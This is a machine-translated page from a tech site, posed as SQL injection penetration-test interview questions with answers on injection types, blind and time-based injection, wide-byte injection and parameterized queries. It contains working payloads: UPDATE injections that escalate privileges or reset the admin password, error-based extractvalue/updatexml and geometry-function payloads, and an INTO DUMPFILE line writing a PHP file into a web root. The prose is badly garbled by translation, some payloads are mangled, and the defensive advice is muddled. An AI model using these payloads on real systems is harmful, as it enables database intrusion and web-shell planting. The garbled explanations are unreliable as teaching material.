Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

What are the questions of SQL injection penetration test and screen protection test?

2025-01-16 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Development >

Share

Shulou(Shulou.com)06/02 Report--

This article mainly introduces the relevant knowledge of "SQL injection penetration test and network protection test questions". The editor shows you the operation process through actual cases, the operation method is simple and fast, and it is practical. I hope that this article "what are the SQL injection penetration test and network protection test questions" can help you solve the problem.

Causes of SQL injection vulnerabilities, types and methods of injection, prevention?

Submit error statement whether there is any exception, in addition, these displayed errors can be passed through sleep, sleep statement hold for 5 seconds, return value through DNSlog judgment, etc.

Select * from news where id ='$SQL'

When the program accesses news and other operations, it will be called into the sql statement. If illegal data is submitted during this call, the "database" method will report an error. That is to say, "cut and output" is harmful.

There are 6 types of injection, you can refer to SQLMAP, error report, blind injection, joint, time, inline, stack

Injection submission method: GET, POST, Cookies, component header

Precautions: border-> CDN (content delivery Network)-> script "filtering-> Database filtering minimum permissions-> hosts

What is a blind bet? How do you bet blindly?

Blind injection means that during the SQL comment attack, the server turns off the error echo. We simply judge whether there are SQL comments and benefits based on the changes in the content returned by the server.

There are two kinds of blind segments.

This is to verify whether a comment exists by verifying whether the returned content of the comment is correct (boolean-based).

Whether there is a time-based is judged by the different processing time of the sql statement, where you can benchmark,sleep and other functions that cause delay, or you can achieve the delay by constructing a joint query table of the "Cartesian" product.

Principle of wide byte injection

1. The principle of parturition.

In the case that the database has a wide character set but this problem is not considered in WEB, in the WEB layer, because 0XBF27 is two characters, when addslash and magic_quotes_gpc are turned on in PHP, 0xbf27 will become 0xbf5c27 because the single quotation marks of 0xbf27 will be escaped. When the data enters the database, because 0XBF5C is another character, the escape symbol will be "eaten" by the preceding bf. Single quotation marks escape from this to close the statement.

2. Root cause

Character_set_client (the character set of the client) is different from character_set_connection (the character set of the connection layer), or conversion functions such as iconv and mb_convert_encoding make it inappropriate.

3. Solution

Unify the character set of database, Web, and operating system to avoid parsing differences, preferably set to UTF-8. Or correct escaping of data, such as mysql_real_escape_string+mysql_set_charset.

The only thing in SQL is how to use update

Understand this sentence SQL first.

UPDATE user SET password='MD5 ($password)', homepage='$homepage' WHERE id='$id'

If the SQL is modified to the following form, the annotation is implemented

1. Change the homepage value to http://xxx.net values, userlevel='3.

Then the SQL statement becomes

UPDATE user SET password='mypass', homepage=' http://xxx.net', userlevel='3' WHERE id='$id'

Userlevel is subscriber level

2. Modify the password value to mypass) 'WHERE username='admin'#

Then the SQL statement becomes

UPDATE user SET password='MD5 (mypass) 'WHERE username='admin'#)', homepage='$homepage' WHERE id='$id'

3. After changing the id value to'OR username='admin', the SQL statement becomes

UPDATE user SET password='MD5 ($password)', homepage='$homepage' WHERE id='' OR username='admin' Why parameterized queries prevent SQL injection?

Principle:

So that the parametric query database server will not implement the contents of the parameters as part of the sql directive, but will not run the parameters until the database has completed the compilation of the sql instruction.

To put it simply: the reason why parameterization can prevent annotation is that the statement is the statement, the parameter is the parameter, the value of the parameter is not part of the statement, and the database only runs according to the semantics of the statement.

What are the functions that report error injection? And extractvalue (1, concat (0x7e, (select @ @ version), 0x7e)) + and updatexml (1, concat (0x7e, (secect @ @ version), 0x7e), 1) geometrycollection () selectfrom test where id=1 and geometrycollection ((selectfrom (selectfrom (select user () a) b); multipoint () selectfrom test where id=1 and multipoint ((selectfrom (selectfrom (select user () a) b)) Polygon () select from test where id=1 and polygon ((select from (select from (select user ()) a) b); multipolygon () select from test where id=1 and multipolygon ((select from (select from (select user () a) b); linestring () select from test where id=1 and linestring ((select from (select from (select user ()) a) b); multilinestring () select from test where id=1 and multilinestring ((select from (select from (select user ()) a) b)) Exp () select from test where id=1 and exp (~ (select * from (select user ()) a)

How to judge delayed injection?

If (ascii (substr ("hello", 1,1)) = 104, sleep (5), 1)

What do blind injection and delayed injection have in common?

It's all a "character" judgment.

What are the functions of sql injection to write files?

Select 'into outfile' path 'select' sentence 'into dumpfile' path 'select' 'into dumpfile'd:\ wwwroot\ baidu.com\ nvhack.php; how to protect against SQL injection attacks?

1. Filter the code for illegal symbols like this, filter and replace some script tags scrpt as well as img or frame.

two。 Some function variables are directly forcibly defined, for example, the amount function is directly limited to values of positive integer type, then other parameters, such as names, can be directly limited to values only in Chinese and English, and so on.

3. For some statements brought into the database query and update, be sure to see whether the data parameters from get or post lock the parameter type directly to prevent the injection of malicious statements from being attacked.

This is the end of the content about "what are the questions of SQL injection penetration test and screen protection test". Thank you for your reading. If you want to know more about the industry, you can follow the industry information channel. The editor will update different knowledge points for you every day.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Share To

Development

Wechat

© 2024 shulou.com SLNews company. All rights reserved.

12
Report